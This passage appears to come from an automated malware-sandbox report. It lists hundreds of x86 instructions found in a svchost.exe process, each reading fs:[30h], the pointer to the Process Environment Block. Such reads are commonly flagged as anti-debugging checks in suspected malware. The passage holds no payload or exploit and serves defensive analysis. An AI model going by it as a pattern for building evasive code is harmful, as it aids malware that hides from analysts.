            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h]1_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h]1_2_03CB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h]1_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h]1_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h]1_2_03CD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0634F mov eax, dword ptr fs:[00000030h]1_2_03D0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h]1_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h]1_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h]1_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov ecx, dword ptr fs:[00000030h]1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D062D6 mov eax, dword ptr fs:[00000030h]1_2_03D062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h]1_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h]1_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0625D mov eax, dword ptr fs:[00000030h]1_2_03D0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h]1_2_03C2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h]1_2_03C36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h]1_2_03C2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h]1_2_03C2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h]1_2_03D061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h]1_2_03C601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h]1_2_03C70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h]1_2_03C2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h]1_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h]1_2_03CF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h]1_2_03C60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h]1_2_03CB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03C2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h]1_2_03C380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h]1_2_03CB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03C2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h]1_2_03C720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h]1_2_03C3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C280A0 mov eax, dword ptr fs:[00000030h]1_2_03C280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h]1_2_03CC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h]1_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h]1_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h]1_2_03CB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h]1_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h]1_2_03CB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A020 mov eax, dword ptr fs:[00000030h]1_2_03C2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C020 mov eax, dword ptr fs:[00000030h]1_2_03C2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6030 mov eax, dword ptr fs:[00000030h]1_2_03CC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB07C3 mov eax, dword ptr fs:[00000030h]1_2_03CB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03CBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD678E mov eax, dword ptr fs:[00000030h]1_2_03CD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C307AF mov eax, dword ptr fs:[00000030h]1_2_03C307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE47A0 mov eax, dword ptr fs:[00000030h]1_2_03CE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov esi, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30750 mov eax, dword ptr fs:[00000030h]1_2_03C30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE75D mov eax, dword ptr fs:[00000030h]1_2_03CBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4755 mov eax, dword ptr fs:[00000030h]1_2_03CB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38770 mov eax, dword ptr fs:[00000030h]1_2_03C38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
